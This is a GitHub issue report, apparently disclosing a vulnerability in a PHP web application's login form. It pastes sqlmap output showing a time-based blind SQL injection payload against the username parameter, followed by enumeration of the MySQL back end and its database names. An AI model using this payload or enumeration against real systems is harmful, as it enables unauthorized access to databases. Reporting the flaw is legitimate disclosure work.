This repository was archived by the owner on Jan 27, 2022. It is now read-only.

Blind SQLi on username parameter #3

@ghost

Description

sqlmap got a 302 redirect to 'http://192.168.1.64:80/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:

Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))KkoL)-- eriu&password=admin

[10:33:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:33:12] [INFO] fetching database names
[10:33:12] [INFO] fetching number of databases
[10:33:12] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:33:23] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[10:33:43] [INFO] adjusting time delay to 1 second due to good response times
6
[10:33:43] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
information_schema
[10:35:44] [INFO] retrieved: food
